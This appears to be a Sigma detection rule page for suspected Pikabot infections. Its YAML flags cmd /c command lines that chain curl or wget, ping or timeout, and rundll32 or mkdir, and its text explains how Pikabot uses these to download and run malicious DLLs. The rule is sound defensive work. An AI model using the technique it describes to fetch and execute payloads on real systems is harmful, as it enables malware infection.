Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
Convert In Phoenix Studio
Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.
Developed to detect an active or emerging threat. Prioritize investigation of any alerts and correlate with threat intelligence.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
selection_cmd:
CommandLine|contains|all:
- 'cmd'
- '/c'
selection_pipes:
CommandLine|contains:
- ' & '
- ' || '
selection_commands_1:
CommandLine|contains:
- ' curl'
- ' wget'
- ' timeout '
- ' ping '
selection_commands_2:
CommandLine|contains:
- ' rundll32'
- ' mkdir '
condition: all of selection_*False positive likelihood has not been assessed. Additional context may be needed during triage.
Sub-techniques
Other